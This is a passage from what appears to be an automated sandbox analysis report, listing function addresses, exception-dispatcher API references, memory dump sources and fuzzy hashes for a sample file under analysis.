                                                                                            • Instruction ID: 927f54091d44d79c93ea11ed824ff887de0dcc739c015ad83d1f5c65c9fc8158
                                                                                            • Opcode Fuzzy Hash: db58713585e3a69251ff596069734d6abdd75fa92419783d6d62eb1e311c3b12
                                                                                            • Instruction Fuzzy Hash: F7025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A721D Relevance: 4.8, APIs: 3, Instructions: 333COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 426 60a721d-60a7e2a KiUserExceptionDispatcher * 3 560 60a7e30-60a7e7f 426->560
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 476782c9cfbd54aaa332205e74e4cc3097195526ad48f57a502f453ee2046822
                                                                                            • Instruction ID: e6e82a29cde0cc00a83baa3ca4eb765c9b4eb381afc9eee1d499e3970c9a15e2
                                                                                            • Opcode Fuzzy Hash: 476782c9cfbd54aaa332205e74e4cc3097195526ad48f57a502f453ee2046822
                                                                                            • Instruction Fuzzy Hash: 90025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7262 Relevance: 4.8, APIs: 3, Instructions: 326COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 563 60a7262-60a7e2a KiUserExceptionDispatcher * 3 694 60a7e30-60a7e7f 563->694
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 609867294c3730ad641bf2a3c7f087157123bf7e49da7c2f4d6606fdc6c1c02d
                                                                                            • Instruction ID: 121c0e4f09264e0c76a5a69dea7817cee0d9b1cf386a4bf1d2c34a8c4e19fde0
                                                                                            • Opcode Fuzzy Hash: 609867294c3730ad641bf2a3c7f087157123bf7e49da7c2f4d6606fdc6c1c02d
                                                                                            • Instruction Fuzzy Hash: C3025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A72A7 Relevance: 4.8, APIs: 3, Instructions: 319COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 697 60a72a7-60a7e2a KiUserExceptionDispatcher * 3 825 60a7e30-60a7e7f 697->825
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 15a19fee69eab805aee36b3826ecb88f72ed457e72bdb0ee49d86b5ec2afb91b
                                                                                            • Instruction ID: d41bc6caf2d1e8413d330e84813ce2f1c6d696c652b5549c994ae4bf72c5919b
                                                                                            • Opcode Fuzzy Hash: 15a19fee69eab805aee36b3826ecb88f72ed457e72bdb0ee49d86b5ec2afb91b
                                                                                            • Instruction Fuzzy Hash: 30F15738A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A72EC Relevance: 4.8, APIs: 3, Instructions: 312COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 828 60a72ec-60a7e2a KiUserExceptionDispatcher * 3 953 60a7e30-60a7e7f 828->953
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 7eadf27321f03a7b7b73d4affb5c329a0c777f404ba0b74a24f683b0718246a5
                                                                                            • Instruction ID: fb89e1b0039d5dbabd27d663831d6a34a9efee0ad15b6c803cff0c605eafd7d3
                                                                                            • Opcode Fuzzy Hash: 7eadf27321f03a7b7b73d4affb5c329a0c777f404ba0b74a24f683b0718246a5
                                                                                            • Instruction Fuzzy Hash: 80F15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7331 Relevance: 4.8, APIs: 3, Instructions: 305COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 956 60a7331-60a7e2a KiUserExceptionDispatcher * 3 1078 60a7e30-60a7e7f 956->1078
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 02a1d52bac51f3e359d1254ce3e812bdedfe1de3f7a6162956e439ff8329c33d
                                                                                            • Instruction ID: 535a161ee7faec9a6543781e4d8186a3b79b561c2cb8dc7c0405e69bd6f3ef7e
                                                                                            • Opcode Fuzzy Hash: 02a1d52bac51f3e359d1254ce3e812bdedfe1de3f7a6162956e439ff8329c33d
                                                                                            • Instruction Fuzzy Hash: 2AF15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7376 Relevance: 4.8, APIs: 3, Instructions: 298COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1081 60a7376-60a7e2a KiUserExceptionDispatcher * 3 1200 60a7e30-60a7e7f 1081->1200
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: aed677a7b0e0beb4faec3eb9def2951cb8beadc48e64487e957620be61e29559
                                                                                            • Instruction ID: 99066f03bd690167ad035d34450b5b364937c0df187a197efc5b1ec3c9affb45
                                                                                            • Opcode Fuzzy Hash: aed677a7b0e0beb4faec3eb9def2951cb8beadc48e64487e957620be61e29559
                                                                                            • Instruction Fuzzy Hash: C2F15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A73BB Relevance: 4.8, APIs: 3, Instructions: 289COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1203 60a73bb-60a7e2a KiUserExceptionDispatcher * 3 1319 60a7e30-60a7e7f 1203->1319
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 5223af187b33e814280529968ab0470c8900e8632ab324416147d71387cb1f4a
                                                                                            • Instruction ID: 5381c25a4e3c3669d4cf4571ba6590c953f205f697eaecf7ecef9087f793c7ec
                                                                                            • Opcode Fuzzy Hash: 5223af187b33e814280529968ab0470c8900e8632ab324416147d71387cb1f4a
                                                                                            • Instruction Fuzzy Hash: CDE15638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A73F7 Relevance: 4.8, APIs: 3, Instructions: 284COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1322 60a73f7-60a7e2a KiUserExceptionDispatcher * 3 1435 60a7e30-60a7e7f 1322->1435
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: b74bbd5e6add8bffe0daab483be843328c03d5496919df96a83b3f32003143d8
                                                                                            • Instruction ID: 36d8cf47d9fde8add19b1e5a59ad5faefba10be3dc338b6fbbb9015c2251c545
                                                                                            • Opcode Fuzzy Hash: b74bbd5e6add8bffe0daab483be843328c03d5496919df96a83b3f32003143d8
                                                                                            • Instruction Fuzzy Hash: A2E15638A45358CFCB65DF60D88869DBBB2BF49346F5080E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A743C Relevance: 4.8, APIs: 3, Instructions: 277COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1438 60a743c-60a7e2a KiUserExceptionDispatcher * 3 1548 60a7e30-60a7e7f 1438->1548
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: dc2f7e4de22565af56f5ca8d08e40888740d9e97d7aba7bc111eaa7335f06214
                                                                                            • Instruction ID: ec7153b7bf7cad2c4e2d0849ed8a1069f6c0b5989e24c39f3c3fceaaed5e605d
                                                                                            • Opcode Fuzzy Hash: dc2f7e4de22565af56f5ca8d08e40888740d9e97d7aba7bc111eaa7335f06214
                                                                                            • Instruction Fuzzy Hash: 12E15638A45368CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7481 Relevance: 4.8, APIs: 3, Instructions: 268COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1551 60a7481-60a7e2a KiUserExceptionDispatcher * 3 1658 60a7e30-60a7e7f 1551->1658
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: e49caa5ed6b4a2a8401b8d568dc88d6d8180007f8db9e3457be994c5f319be2d
                                                                                            • Instruction ID: d88d2f024b84436e6a2ac3280b49a6ef97520588daf4dcb10014d0a812cdae5a
                                                                                            • Opcode Fuzzy Hash: e49caa5ed6b4a2a8401b8d568dc88d6d8180007f8db9e3457be994c5f319be2d
                                                                                            • Instruction Fuzzy Hash: EBD15638A45358CFCB65DF60D88869DBBB2BF49346F6081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A74BD Relevance: 4.8, APIs: 3, Instructions: 263COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1661 60a74bd-60a7e2a KiUserExceptionDispatcher * 3 1765 60a7e30-60a7e7f 1661->1765
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 9796f41bd217db6af0e127cbc9c4c15bf0aab03a0e200edf2b16936ecffbec47
                                                                                            • Instruction ID: c1b4693f2b6c772397bf444f8664804e314a9d3554814244d356d0bb0f9d9eb6
                                                                                            • Opcode Fuzzy Hash: 9796f41bd217db6af0e127cbc9c4c15bf0aab03a0e200edf2b16936ecffbec47
                                                                                            • Instruction Fuzzy Hash: 05D14538A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7502 Relevance: 4.8, APIs: 3, Instructions: 256COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1768 60a7502-60a7e2a KiUserExceptionDispatcher * 3 1869 60a7e30-60a7e7f 1768->1869
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: c9f927a6a84a828289b667f5377deafab4c5c4b01807391f5a931d03a895c507
                                                                                            • Instruction ID: 26d9128e0075f35869b7e3dbbfb33ef4ce920ac8551c7532173417ff5125ccd9
                                                                                            • Opcode Fuzzy Hash: c9f927a6a84a828289b667f5377deafab4c5c4b01807391f5a931d03a895c507
                                                                                            • Instruction Fuzzy Hash: 6FD14638A45358CFCB65DF60D88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7547 Relevance: 4.7, APIs: 3, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: ef39db867c92b04466feff8f93b69c6528b31c4ff3b2dac7f802b0d737e82f6e
                                                                                            • Instruction ID: 6c521c751e25aadd684b3af416f9bab7703474a862fa600b6907f4344f06b146
                                                                                            • Opcode Fuzzy Hash: ef39db867c92b04466feff8f93b69c6528b31c4ff3b2dac7f802b0d737e82f6e
                                                                                            • Instruction Fuzzy Hash: E6D14538A45358CFCB65DF60D88869DBBB2BF49346F1081E9D50AA2740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A758C Relevance: 4.7, APIs: 3, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 3471e681aed47fa2d20ae3356258533288e8a9c3e69f6d9a6b237446f9a47d6a
                                                                                            • Instruction ID: 0d44f4ab69154695495cde242de0451fb0169cf29d651b38f4c64c9e6b6e9e82
                                                                                            • Opcode Fuzzy Hash: 3471e681aed47fa2d20ae3356258533288e8a9c3e69f6d9a6b237446f9a47d6a
                                                                                            • Instruction Fuzzy Hash: B9C14538A45358CFCB65DF60D88869DBBB2BF49346F1081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A75D1 Relevance: 4.7, APIs: 3, Instructions: 235COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 0ca61d4593e33b4886ca18b95781227bab4e4c2d1a71a1870337461bffc38538
                                                                                            • Instruction ID: c9a24869daef38215550f82cd4a1c0d54d5f16856c55c642460a6d3e79ebf3d0
                                                                                            • Opcode Fuzzy Hash: 0ca61d4593e33b4886ca18b95781227bab4e4c2d1a71a1870337461bffc38538
                                                                                            • Instruction Fuzzy Hash: 28C14538A45358CFCB65DF60C88869DBBB2BF49346F5081E9D50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7616 Relevance: 4.7, APIs: 3, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 9609418bfeab5ec828c982a9e8e0b5c81658aee387521376989c504f4531fc35
                                                                                            • Instruction ID: ff132225a6ab34be6ccaf1615158893110283aa90d220a883f2b5669ccec949e
                                                                                            • Opcode Fuzzy Hash: 9609418bfeab5ec828c982a9e8e0b5c81658aee387521376989c504f4531fc35
                                                                                            • Instruction Fuzzy Hash: 28C14538A45358CFCB65DF60D88869DBBB2BF49346F1081E9D50A62740CB399EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A765B Relevance: 4.7, APIs: 3, Instructions: 221COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 48ea3f2fed6dc2d00ce039933201da440ccfcc3e789dfc4fc9d9e344b7158d15
                                                                                            • Instruction ID: b4fb701ad31a250b2fab810c2e2debbda5588e01b8a36d2113c8d692f3cc3f03
                                                                                            • Opcode Fuzzy Hash: 48ea3f2fed6dc2d00ce039933201da440ccfcc3e789dfc4fc9d9e344b7158d15
                                                                                            • Instruction Fuzzy Hash: 50B14538A45358CFCB65DF60C88869DBBB2BF49346F1081E9D50A62740DB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A76A0 Relevance: 3.2, APIs: 2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 43997b6f605b4732bdbe5b5cdee1c85727034c40ef218ca2ea807a5fa2315b91
                                                                                            • Instruction ID: 20d094bc10d618ec843670a9f24b6568ecf578657ec40219703debe3b8db18e2
                                                                                            • Opcode Fuzzy Hash: 43997b6f605b4732bdbe5b5cdee1c85727034c40ef218ca2ea807a5fa2315b91
                                                                                            • Instruction Fuzzy Hash: 3DB14538A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A76E5 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 3b453e5c957ab27e1939a6fb5219c97f290c23a9e32e14408e01c28b8d9453eb
                                                                                            • Instruction ID: 38b525d41289d8cbcbc0598165ed63d70ea3a4d053a1f9510b56ad426657e585
                                                                                            • Opcode Fuzzy Hash: 3b453e5c957ab27e1939a6fb5219c97f290c23a9e32e14408e01c28b8d9453eb
                                                                                            • Instruction Fuzzy Hash: 4DB14438A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A772A Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 92b5ce110fe14e44ad47b3d27b51babf297cd474e6bcf0c452fcf1e554d66972
                                                                                            • Instruction ID: 9feed7fa33c1efa51177c3728d2c90c1a1b9f57f5cbd31270357da44735b05e4
                                                                                            • Opcode Fuzzy Hash: 92b5ce110fe14e44ad47b3d27b51babf297cd474e6bcf0c452fcf1e554d66972
                                                                                            • Instruction Fuzzy Hash: E0A14538A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A776F Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
